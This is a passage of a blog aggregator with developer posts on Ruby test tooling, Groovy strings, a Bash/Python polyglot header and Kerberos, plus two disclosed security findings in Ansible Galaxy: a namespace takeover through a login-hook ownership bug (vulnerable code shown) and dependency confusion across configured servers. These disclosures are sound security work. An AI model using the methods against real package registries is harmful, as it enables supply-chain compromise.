    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:337:in `with_info_handler'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:309:in `run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in `block in __run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in `map'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in `__run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:136:in `run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:63:in `block in autorun'
rake aborted!
Oh nice, this is even better! Instead of the mangled class name, we now get the very same error the Foreman tests aborted with, plus a nice stack trace! But wait, why is it pointing at railties? We're not loading that! Anyways, let's look at railties-6.1.4.1/lib/rails/test_unit/reporter.rb, line 68
def format_line(result)
  klass = result.respond_to?(:klass) ? result.klass : result.class
  "%s#%s = %.2f s = %s" % [klass, result.name, result.time, result.result_code]
end
Heh, this is touching result.klass, which we just messed up. Nice! But quickly back to railties… What if we only add that to the Gemfile, not full-blown Rails?
gem 'railties'
gem 'rake'
gem 'mocha'
gem 'minitest', '~> 5.1', '< 5.11'
Yepp, same failure. Also happens with require => false added to the line, so it seems railties somehow injects itself into rake even if nothing is using it?! "Cool"! By the way, why are we still pinning minitest to < 5.11? Oh right, this was the original reason to look into that whole topic. And, uh, it's pointing at klass there already! 4 years ago! So let's remove that boundary and, funny enough, now tests are passing again, even if we use klass! Minitest 5.11 changed how Minitest::Test is structured, and seems not to rely on klass at that point anymore. And I guess Rails also changed a bit since the original pin was put in place four years ago. I didn't want to go down another rabbit hole, finding out what changed in Rails, but I did try with 5.0 (well, 5.0.7.2 to be precise), and the output with newer (>= 5.11) Minitest was interesting:
$ bundle exec rake test TESTOPTS=-v
 
Minitest::Result#test_lol = 0.00 s = .
It's leaking Minitest::Result as klass now, instead of Mocha::Mock. So probably something along these lines was broken 4 years ago and triggered this pin. What do we learn from that?
  • klass is cursed and shouldn't be used in places where inheritance and tooling might decide to use it for some reason
  • inheritance is cursed - why the heck are implementation details of Minitest leaking inside my tests?!
  • tooling is cursed - why is railties injecting stuff when I didn't ask it to?!
  • dependency pinning is cursed - at least if you pin to avoid an issue and then forget about said issue for four years
  • I like cursed things!

3 December 2021

Evgeni Golov: Dependency confusion in the Ansible Galaxy CLI

I hope you enjoyed my last post about Ansible Galaxy Namespaces. In there I noted that I originally looked for something completely different and the namespace takeover was rather accidental. Well, originally I was looking at how the different Ansible content hosting services and their client (ansible-galaxy) behave in regard to clashes in naming of the hosted content. "Ansible content hosting services"?! There are currently three main ways for users to obtain Ansible content:
  • Ansible Galaxy - the original, community oriented, free hosting platform
  • Automation Hub - the place for Red Hat certified and supported content, available only with a Red Hat subscription, hosted by Red Hat
  • Ansible Automation Platform - the on-premise version of Automation Hub, syncs content from there and allows customers to upload own content
Now the question I was curious about was: how would the tooling behave if different sources offered identically named content? This was inspired by Alex Birsan: Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies and zofrex: Bundler is Still Vulnerable to Dependency Confusion Attacks (CVE-2020-36327), who showed that the tooling for Python, Node.js and Ruby can be tricked into fetching content from "the wrong source", thus allowing an attacker to inject malicious code into a deployment. For the rest of this article, it's not important that there are different implementations of the hosting services, only that users can configure and use multiple sources at the same time. The problem is that, if the user configures their server_list to contain multiple Galaxy-compatible servers, like Ansible Galaxy and Automation Hub, and then asks to install a collection, the Ansible Galaxy CLI will ask every server in the list, until one returns a successful result. The exact order seems to differ between versions, but this doesn't really matter for the issue at hand. Imagine someone wants to install the redhat.satellite collection from Automation Hub (using ansible-galaxy collection install redhat.satellite). Now if their configuration defines Galaxy as the first, and Automation Hub as the second server, Galaxy is always asked whether it has redhat.satellite and only if the answer is negative, Automation Hub is asked. Today there is no redhat namespace on Galaxy, but there is a redhat user on GitHub, so… The canonical answer to this issue is to use a requirements.yml file and set the source parameter. This parameter allows you to express "regardless which sources are configured, please fetch this collection from here". That's nice, but I think this not being the default syntax (contrary to what e.g. Bundler does) is a bad approach. Users might overlook the security implications, as the shorter syntax without the source just "magically" works. However, I think this is not even the main problem here. The documentation says: Once a collection is found, any of its requirements are only searched within the same Galaxy instance as the parent collection. The install process will not search for a collection requirement in a different Galaxy instance. But as it turns out, the source behavior was changed and now only applies to the exact collection it is set for, not for any dependencies this collection might have. For the sake of the example, imagine two collections: evgeni.test1 and evgeni.test2, where test2 declares a dependency on test1 in its galaxy.yml. Actually, no need to imagine, both collections are available in version 1.0.0 from galaxy.ansible.com and test1 version 2.0.0 is available from galaxy-dev.ansible.com. Now, given our recent reading of the docs, we craft the following requirements.yml:
collections:
- name: evgeni.test2
  version: '*'
  source: https://galaxy.ansible.com
In a perfect world, following the documentation, this would mean that both collections are fetched from galaxy.ansible.com, right? However, this is not what ansible-galaxy does. It will fetch evgeni.test2 from the specified source, determine it has a dependency on evgeni.test1 and fetch that from the "first" available source from the configuration. Take for example the following ansible.cfg:
[galaxy]
server_list = test_galaxy, release_galaxy, test_galaxy
[galaxy_server.release_galaxy]
url=https://galaxy.ansible.com/
[galaxy_server.test_galaxy]
url=https://galaxy-dev.ansible.com/
And try to install collections, using the above requirements.yml:
% ansible-galaxy collection install -r requirements.yml -vvv                 
ansible-galaxy 2.9.27
  config file = /home/evgeni/Devel/ansible-wtf/collections/ansible.cfg
  configured module search path = ['/home/evgeni/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules']
  ansible python module location = /usr/lib/python3.10/site-packages/ansible
  executable location = /usr/bin/ansible-galaxy
  python version = 3.10.0 (default, Oct  4 2021, 00:00:00) [GCC 11.2.1 20210728 (Red Hat 11.2.1-1)]
Using /home/evgeni/Devel/ansible-wtf/collections/ansible.cfg as config file
Reading requirement file at '/home/evgeni/Devel/ansible-wtf/collections/requirements.yml'
Found installed collection theforeman.foreman:3.0.0 at '/home/evgeni/.ansible/collections/ansible_collections/theforeman/foreman'
Process install dependency map
Processing requirement collection 'evgeni.test2'
Collection 'evgeni.test2' obtained from server explicit_requirement_evgeni.test2 https://galaxy.ansible.com/api/
Opened /home/evgeni/.ansible/galaxy_token
Processing requirement collection 'evgeni.test1' - as dependency of evgeni.test2
Collection 'evgeni.test1' obtained from server test_galaxy https://galaxy-dev.ansible.com/api
Starting collection install process
Installing 'evgeni.test2:1.0.0' to '/home/evgeni/.ansible/collections/ansible_collections/evgeni/test2'
Downloading https://galaxy.ansible.com/download/evgeni-test2-1.0.0.tar.gz to /home/evgeni/.ansible/tmp/ansible-local-133/tmp9uqyjgki
Installing 'evgeni.test1:2.0.0' to '/home/evgeni/.ansible/collections/ansible_collections/evgeni/test1'
Downloading https://galaxy-dev.ansible.com/download/evgeni-test1-2.0.0.tar.gz to /home/evgeni/.ansible/tmp/ansible-local-133/tmp9uqyjgki
As you can see, evgeni.test1 is fetched from galaxy-dev.ansible.com, instead of galaxy.ansible.com. Now, if those servers were instead Galaxy and Automation Hub, and somebody managed to snag the redhat namespace on Galaxy, I would now be getting the wrong stuff… Another problematic setup would be with Galaxy and on-prem Ansible Automation Platform, as you can have any namespace on the latter and these most certainly can clash with namespaces on public Galaxy. I have reported this behavior to Ansible Security on 2021-08-26, giving a 90-day disclosure deadline, which expired on 2021-11-24. So far, the response was that this is working as designed, to allow cross-source dependencies (e.g. a private collection referring to one on Galaxy) and there is an issue to update the docs to match the code. If users want to explicitly pin sources, they are supposed to name all dependencies and their sources in requirements.yml. Alternatively they obviously can configure only one source in the configuration and always mirror all dependencies. I am not happy with this and I think this is terrible UX, explicitly inviting people to make mistakes.

2 December 2021

Jonathan McDowell: Building a desktop to improve my work/life balance

ASRock DeskMini X300 It's been over 20 months since the first COVID lockdown kicked in here in Northern Ireland and I started working from home. Even when the strict lockdown was lifted the advice here has continued to be "If you can work from home you should work from home". I've been into the office here and there (for new starts given you need to hand over a laptop and sort out some login details it's generally easier to do so in person, and I've had a couple of whiteboard sessions that needed the high bandwidth face to face communication), but day to day is all from home. Early on I commented that work had taken over my study. This has largely continued to be true. I set my work laptop on the stand on a Monday morning and it sits there until Friday evening, when it gets switched for the personal laptop. I have a lovely LG 34UM88 21:9 Ultrawide monitor, and my laptops are small and light so I much prefer to use them docked. Also my general working pattern is to have a lot of external connections up and running (build machine, test devices, log host) which means a suspend/resume cycle disrupts things. So I like to minimise moving things about. I spent a little bit of time trying to find a dual laptop stand so I could have both machines setup and switch between them easily, but I didn't find anything that didn't seem to be geared up for DJs with a mixer + laptop combo taking up quite a bit of desk space rather than stacking laptops vertically. Eventually I realised that the right move was probably a desktop machine. Now, I haven't had a desktop machine since before I moved to the US, realising at the time that having everything on my laptop was much more convenient. I decided I didn't want something too big and noisy. Cheap GPUs seem hard to get hold of these days - I'm not a gamer so all I need is something that can drive a ~4K monitor reliably enough. Looking around the AMD Ryzen 7 5700G seemed to be a decent CPU with one of the better integrated GPUs. I spent some time looking for a reasonable Mini-ITX case + motherboard and then I happened upon the ASRock DeskMini X300. This turns out to be perfect; I've no need for a PCIe slot or anything more than an m.2 SSD. I paired it with a Noctua NH-L9a-AM4 heatsink + fan (same as I use in the house server), 32GB DDR4 and a 1TB WD SN550 NVMe SSD. Total cost just under 650 inc VAT + delivery (and that's a story for another post). A desktop solves the problem of fitting both machines on the desk at once, but there's still the question of smoothly switching between them. I read Evgeni Golov's article on a simple KVM switch for 30. My monitor has multiple inputs, so that's sorted. I did have a cheap USB2 switch (all I need for the keyboard/trackball) but it turned out to be pretty unreliable at the host detecting the USB change. I bought a UGREEN USB 3.0 Sharing Switch Box instead and it's turned out to be pretty reliable. The problem is that the LG 32UM88 turns out to have a poor DDC implementation, so while I can flip the keyboard easily with the UGREEN box I also have to manually select the monitor input. Which is a bit annoying, but not terrible. The important question is whether this has helped. I built all this at the end of October, so I've had a month to play with it. Turns out I should have done it at some point last year. At the end of the day instead of either sitting at work for a bit longer, or completely avoiding the study, I'm able to lock the work machine and flick to my personal setup.
Even sitting in the same seat that "disconnect", and the knowledge I won't see work Slack messages or emails come in and feel I should respond, really helps. It also means I have access to my personal setup during the week without incurring a hit at the start of the working day when I have to set things up again. So it's much easier to just dip in to some personal tech stuff in the evening than it was previously. Also from the point of view I don't need to set up the personal config, I can pick up where I left off. All of which is really nice. It's also got me thinking about other minor improvements I should make to my home working environment to try and improve things. One obvious thing now the winter is here again is to improve my lighting; I have a good overhead LED panel but it's terribly positioned for video calls, being just behind me. So I think I'm looking for some sort of strip light I can have behind the large monitor to give a decent degree of backlight (possibly bouncing off the white wall). Lots of cheap options I'm not convinced about, and I've had a few ridiculously priced options from photographer friends; suggestions welcome.

29 November 2021

Evgeni Golov: Getting access to somebody else's Ansible Galaxy namespace

TL;DR: adding features after the fact is hard, normalizing names is hard, it's patched, carry on. I promise, the longer version is more interesting and fun to read! Recently, I was poking around Ansible Galaxy and almost accidentally got access to someone else's namespace. I was actually looking for something completely different, but accidental finds are the best ones! If you're asking yourself: "what the heck is he talking about?!", let's slow down for a moment:
  • Ansible is a great automation engine built around the concept of modules that do things (mostly written in Python) and playbooks (mostly written in YAML) that tell which things to do
  • Ansible Galaxy is a place where people can share their playbooks and modules for others to reuse
  • Galaxy Namespaces are a way to allow users to distinguish who published what and reduce name clashes to a minimum
That means that if I ever want to share how to automate installing vim, I can publish evgeni.vim on Galaxy and other people can download that and use it. And if my evil twin wants their vim recipe published, it will end up being called evilme.vim. Thus while both recipes are called vim they can coexist, can be downloaded to the same machine, and used independently. How do you get a namespace? It's automatically created for you when you login for the first time. After that you can manage it, you can upload content, allow others to upload content and other things. You can also request additional namespaces, this is useful if you want one for an Organization or similar entities, which don't have a login for Galaxy. Apropos login, Galaxy uses GitHub for authentication, so you don't have to store yet another password, just smash that octocat! Did anyone actually click on those links above? If you did (you didn't, right?), you might have noticed another section in that document: Namespace Limitations. That says:
Namespace names in Galaxy are limited to lowercase word characters (i.e., a-z, 0-9) and _ , must have a minimum length of 2 characters, and cannot start with an _ . No other characters are allowed, including . , - , and space. The first time you log into Galaxy, the server will create a Namespace for you, if one does not already exist, by converting your username to lowercase, and replacing any - characters with _ .
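That conversion is simple enough to sketch in a few lines of Python (my illustration of the rule quoted above, not Galaxy's actual code):
def github_login_to_namespace(login):
    # lowercase the login and replace '-' with '_', as described above
    return login.lower().replace('-', '_')

print(github_login_to_namespace('Evil-Pwnwil-666'))  # evil_pwnwil_666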
For my login evgeni this is pretty boring, as the generated namespace is also evgeni. But for the GitHub user Evil-Pwnwil-666 it will become evil_pwnwil_666. This can be a bit confusing. Another confusing thing is that Galaxy supports two types of content: roles and collections, but namespaces are only for collections! So it is Evil-Pwnwil-666.vim if it's a role, but evil_pwnwil_666.vim if it's a collection. I think part of this split is because collections were added much later and have a much more thought-out design of both the artifact itself and its delivery mechanisms. This is by the way very important for us! Due to the fact that collections (and namespaces!) were added later, there must be code that ensures that users who were created before also get a namespace. Galaxy does this (and I would have done it the same way) by hooking into the login process, and after the user is logged in it checks if a Namespace exists and if not it creates one and sets proper permissions. And this is also exactly where the issue was! The old code looked like this:
    # Create lowercase namespace if case insensitive search does not find match
    qs = models.Namespace.objects.filter(
        name__iexact=sanitized_username).order_by('name')
    if qs.exists():
        namespace = qs[0]
    else:
        namespace = models.Namespace.objects.create(**ns_defaults)
    namespace.owners.add(user)
See how namespace.owners.add is always called? Even if the namespace already existed? Yepp! But how can we exploit that? Any user either already has a namespace (and owns it) or doesn't have one that could be owned. And given users are tied to GitHub accounts, there is no way to confuse Galaxy here. Now, remember how I said one could request additional namespaces, for organizations and stuff? Those will have owners, but the namespace name might not correspond to an existing user! So all we need is to find an existing Galaxy namespace that is not a "default" namespace (aka a specially requested one) and get a GitHub account that (after the funny name conversion) matches the namespace name. Thankfully Galaxy has an API, so I could dump all existing namespaces and their owners. Next I filtered that list to have only namespaces where the owner list doesn't contain a username that would (after conversion) match the namespace name. I found a few. And for one of them (let's call it the_target), the corresponding GitHub username (the-target) was available! Jackpot! I've registered a new GitHub account with that name, logged in to Galaxy and had access to the previously found namespace. This felt like sufficient proof that my attack worked and I mailed my findings to the Ansible Security team. The issue was fixed in d4f84d3400f887a26a9032687a06dd263029bde3 by moving the namespace.owners.add call to the "new namespace" branch. And this concludes the story of how I accidentally got access to someone else's Galaxy namespace (which was revoked after the report, no worries).
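For illustration, the fix described above amounts to roughly this (a sketch based on that description, not the literal diff):
    # Create lowercase namespace if case insensitive search does not find match
    qs = models.Namespace.objects.filter(
        name__iexact=sanitized_username).order_by('name')
    if qs.exists():
        namespace = qs[0]
    else:
        namespace = models.Namespace.objects.create(**ns_defaults)
        # only a freshly created namespace gets the logging-in user added as owner;
        # an existing (e.g. specially requested) namespace keeps its owners untouched
        namespace.owners.add(user)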

19 November 2021

Evgeni Golov: A String is not a String, and that's Groovy!

Halloween is over, but I still have some nightmares to share with you, so sit down, take some hot chocolate and enjoy :) When working with Jenkins, there is almost no way to avoid writing Groovy. Well, unless you only do old style jobs with shell scripts, but y'all know what I think about shell scripts… Anyways, Eric has been rewriting the jobs responsible for building Debian packages for Foreman to pipelines (and thus Groovy). Our build process for pull requests is rather simple:
  1. Setup sources - get the orig tarball and adjust changelog to have an unique version for pull requests
  2. Call pbuilder
  3. Upload the built package to a staging archive for testing
For merges, it's identical, minus the changelog adjustment. And if there are multiple packages changed in one go, it runs each step in parallel for each package. Now I've been doing mass changes to our plugin packages, to move them to a shared postinst helper instead of having the same code over and over in every package. This required changes to many packages and sometimes I'd end up building multiple at once. That should be fine, right? Well, yeah, it did build fine, but the upload only happened for the last package. This felt super weird, especially as I was absolutely sure we did test this scenario (multiple packages in one PR) and it worked just fine… So I went on a ride through the internals of the job, trying to understand why it didn't work. This requires a tad more information about the way we handle packages for Foreman:
  • the archive is handled by freight
  • it has suites like buster, focal and plugins (that one is a tad special)
  • each suite has components that match Foreman releases, so 2.5, 3.0, 3.1, nightly etc
  • core packages (Foreman etc) are built for all supported distributions (right now: buster and focal)
  • plugin packages are built only once and can be used on every distribution
As generating the package index isn't exactly fast in freight, we tried to not run it too often. The idea was that when we build two packages for the same target (suite/version combination), we upload both at once and run import only once for both. That means that when we build Foreman for buster and focal, this results in two parallel builds and then two parallel uploads (as they end up in different suites). But if we build Foreman and Foreman Installer, we have four parallel builds, but only two parallel uploads, as we can batch upload Foreman and Installer per suite. Well, or so was the theory. The Groovy code that was supposed to do this looked roughly like this:
def packages_to_build = find_changed_packages()
def repos = [:]
packages_to_build.each { pkg ->
    suite = 'buster'
    component = '3.0'
    target = "${suite}-${component}"
    if (!repos.containsKey(target)) {
        repos[target] = []
    }
    repos[target].add(pkg)
}
do_the_build(packages_to_build)
do_the_upload(repos)
That's pretty straightforward, no? We create an empty Map, loop over a list of packages and add them to an entry in the map which we pre-create as empty if it doesn't exist. Well, no, the resulting map always ended with only having one element in each target list. And this is also why our original tests always worked: we tested with a PR containing changes to Foreman and a plugin, and plugins go to this special target we have… So I started playing with the code (https://groovyide.com/playground is really great for that!), trying to understand why the heck it erases previous data. The first finding was that it just always ended up jumping into the "if map entry not found" branch, even though the map very clearly had the correct entry after the first package was added. The second one was weird. I was trying to minimize the reproducer code (IMHO always a good idea) and switched target = "${suite}-${component}" to target = "lol". Two entries in the list, only one jump into the "map entry not found" branch. What?! So this is clearly related to the fact that we're using String interpolation here. But hey, that's a totally normal thing to do, isn't it?! Admittedly, at this point, I was lost. I knew what breaks, but not why. Luckily, I knew exactly who to ask: Jens. After a brief "well, that's interesting", Jens quickly found the source of our griefs: Double-quoted strings are plain java.lang.String if there's no interpolated expression, but are groovy.lang.GString instances if interpolation is present. And when we do repos[target] the GString target gets converted to a String, but when we use repos.containsKey() it remains a GString. This is because GStrings get converted to Strings, if the method wants one, but containsKey takes any Object while the repos[target] notation for some reason converts it. Maybe this is because using GString as Map keys should be avoided. We can reproduce this with simpler code:
def map = [:]
def something = "something"
def key = "$ something "
map[key] = 1
println key.getClass()
map.keySet().each  println it.getClass()  
map.keySet().each  println it.equals(key) 
map.keySet().each  println it.equals(key as String) 
Which results in the following output:
class org.codehaus.groovy.runtime.GStringImpl
class java.lang.String
false
true
With that knowledge, the fix was to just use the same repos[target] notation also for checking for existence: Groovy helpfully returns null, which is false-y, when an entry is absent from a Map. So yeah, a String is not always a String, and it'll bite you!

6 November 2021

Evgeni Golov: I just want to run this one Python script

So I couldn't sleep the other night, and my brain wanted to think about odd problems… Ever had a script that's compatible with both, Python 2 and 3, but you didn't want to bother the user to know which interpreter to call? Maybe because the script is often used in environments where only one Python is available (as either /usr/bin/python OR /usr/bin/python3) and users just expect things to work? And it's only that one script file, no package, no additional wrapper script, nothing. Yes, this is a rather odd scenario. And yes, using Python doesn't make it easier, but trust me, you wouldn't want to implement the same in bash. Nothing that you will read from here on should ever be actually implemented, it will summon dragons and kill kittens. But it was a fun midnight thought, and I like to share nightmares! The nice thing about Python is it supports docstrings, essentially strings you can put inside your code which are kind of comments, but without being hidden inside comment blocks. These are often used for documentation that you can reach using Python's help() function. (Did I mention I love help()?) Bash, on the other hand, does not support docstrings. Even better, it doesn't give a damn whether you quote commands or not. You can call "ls" and you'll get your directory listing the same way as with ls. Now, nobody would under normal circumstances quote ls. Parameters to it, sure, those can contain special characters, but ls?! Another nice thing about Python: it doesn't do any weird string interpolation by default (ssssh, f-strings are cool, but not default). So "$(ls)" is exactly that, a string containing a Dollar sign, an open parenthesis, the characters "l" and "s" and a closing parenthesis. Bash, well, Bash will run ls, right? If you don't yet know where this is going, you have a clean mind, enjoy it while it lasts! So another thing that Bash has is exec: "replace[s] the shell without creating a new process". That means that if you write exec python in your script, the process will be replaced with Python, and when the Python process ends, your script ends, as Bash isn't running anymore. Well, technically, your script ended the moment exec was called, as at that point there was no more Bash process to execute the script further. Using exec is a pretty common technique if you want to set up the environment for a program and then call it, without Bash hanging around any longer as it's not needed. So we could have a script like this:
#!/bin/bash
exec python myscript.py "$@"
Here "$@" essentially means "pass all parameters that were passed to this Bash script to the Python call" (see parameter expansion). We could also write it like this:
#!/bin/bash
"exec" "python" "myscript.py" "$@"
As far as Bash is concerned, this is the same script. But it just became valid Python, as for Python those are just docstrings. So, given this is a valid Bash script and a valid Python script now, can we make it do something useful in the Python part? Sure!
#!/bin/bash
"exec" "python" "myscript.py" "$@"
print("lol")
If we call this using Bash, it never gets further than the exec line, and when called using Python it will print lol as that's the only effective Python statement in that file. Okay, but what if this script would be called myscript.py? Exactly, calling it with Python would print lol and calling it with Bash would end up printing lol too (because it gets re-executed with Python). We can even make it name-agnostic, as Bash knows the name of the script we called:
#!/bin/bash
"exec" "python" "$0" "$@"
print("lol")
But this is still calling python, and it could be python3 on the target (or even something worse, but we're not writing a Halloween story here!). Enter another Bash command: command (SCNR!), especially "The -v option causes a single word indicating the command or file name used to invoke command to be displayed". It will also exit non-zero if the command is not found, so we can do things like $(command -v python3 || command -v python) to find a Python on the system.
#!/bin/bash
"exec" "$(command -v python3   command -v python)" "$0" "$@"
print("lol")
Not well readable, huh? Variables help!
#!/bin/bash
__PYTHON="$(command -v python3   command -v python)"
"exec" "$ __PYTHON " "$0" "$@"
print("lol")
For Python the variable assignment is just a var with a weird string, for Bash it gets executed and we store the result. Nice! Now we have a Bash header that will find a working Python and then re-execute itself using said Python, allowing us to use some proper scripting language. If you're worried that $0 won't point at the right file, just wrap it with some readlink -f, as sketched below.
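Putting that readlink -f idea together with the header above could look like the following sketch. Note the unquoted $0 inside the command substitution: it keeps the whole line a sequence of plain Python string literals (and thus breaks on paths containing spaces), so treat it as a toy, like everything else in this post:
#!/bin/bash
__PYTHON="$(command -v python3 || command -v python)"
"exec" "${__PYTHON}" "$(readlink -f $0)" "$@"
print("lol")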

23 July 2021

Evgeni Golov: It's not *always* DNS

Two weeks ago, I had the pleasure to play with Foreman's Kerberos integration and iron out a few long standing kinks. It all started with a user reminding us that Kerberos authentication is broken when Foreman is deployed on CentOS 8, as there is no more mod_auth_kerb available. Given mod_auth_kerb hasn't seen a release since 2013, this is quite understandable. Thankfully, there is a replacement available, mod_auth_gssapi. Even better, it's available in CentOS 7 and 8 and in Debian and Ubuntu too! So I quickly whipped up a PR to completely replace mod_auth_kerb with mod_auth_gssapi in our installer and successfully tested that it still works in CentOS 7 (even if upgrading from a mod_auth_kerb installation) and CentOS 8. Yay, the issue at hand seemed fixed. But just writing a post about that would've been boring, huh? Well, and then I dared to test the same on Debian… Turns out, our installer was using the wrong path to the Apache configuration and the wrong username Apache runs under while trying to set up Kerberos, so it could not have ever worked. Luckily Ewoud and I were able to fix that too. And yet the installer was still unable to fetch the keytab from my FreeIPA server… Let's dig deeper! To fetch the keytab, the installer does roughly this:
# kinit -k
# ipa-getkeytab -k http.keytab -p HTTP/foreman.example.com
And if one executes that by hand to see the actual error, you see:
# kinit -k
kinit: Cannot determine realm for host (principal host/foreman@)
Well, yeah, the principal looks kinda weird (no realm) and the interwebs say for "kinit: Cannot determine realm for host":
  • Kerberos cannot determine the realm name for the host. (Well, duh, that's what it said?!)
  • Make sure that there is a default realm name, or that the domain name mappings are set up in the Kerberos configuration file (krb5.conf)
And guess what, all of these are perfectly set by ipa-client-install when joining the realm… But there must be something, right? Looking at the principal in the error, it's missing both the domain of the host and the realm. I was pretty sure that my DNS and config was right, but what about gethostname(2)?
# hostname
foreman
Bingo! Let's see what happens if we force that to be an FQDN?
# hostname foreman.example.com
# kinit -k
NO ERRORS! NICE! We're doing science here, right? And I still have the CentOS 8 box I had for the previous round of tests. What happens if we set that to have a shortname? Nothing. It keeps working fine. And what about CentOS 7? VMs are cheap. Well, that breaks like on Debian, if we force the hostname to be short. Interesting. Is it a version difference between the systems?
  • Debian 10 has krb5 1.17-3+deb10u1
  • CentOS 7 has krb5 1.15.1-50.el7
  • CentOS 8 has krb5 1.18.2-8.el8
So, something changed in 1.18? Looking at the krb5 1.18 changelog the following entry jumps at one: Expand single-component hostnames in host-based principal names when DNS canonicalization is not used, adding the system's first DNS search path as a suffix. Given Debian 11 has krb5 1.18.3-5 (well, testing has, so let's pretend bullseye will too), we can retry the experiment there, and it shows that it works with both short and full hostnames. So yeah, it seems krb5 "does the right thing" since 1.18, and before that gethostname(2) must return an FQDN. I've documented that for our users and can now sleep a bit better. At least, it wasn't DNS, right?! Btw, freeipa won't be in bullseye, which makes me a bit sad, as that means that Foreman won't be able to automatically join FreeIPA realms if deployed on Debian 11.
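By the way, a quick way to see what a given box reports, and thus what a pre-1.18 krb5 will build the host principal from, is Python's socket module: socket.gethostname() wraps gethostname(2), while socket.getfqdn() shows the canonicalized name you'd want on older krb5:
import socket

print(socket.gethostname())  # what gethostname(2) returns and what the principal is built from
print(socket.getfqdn())      # the fully qualified name you want to see on krb5 < 1.18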
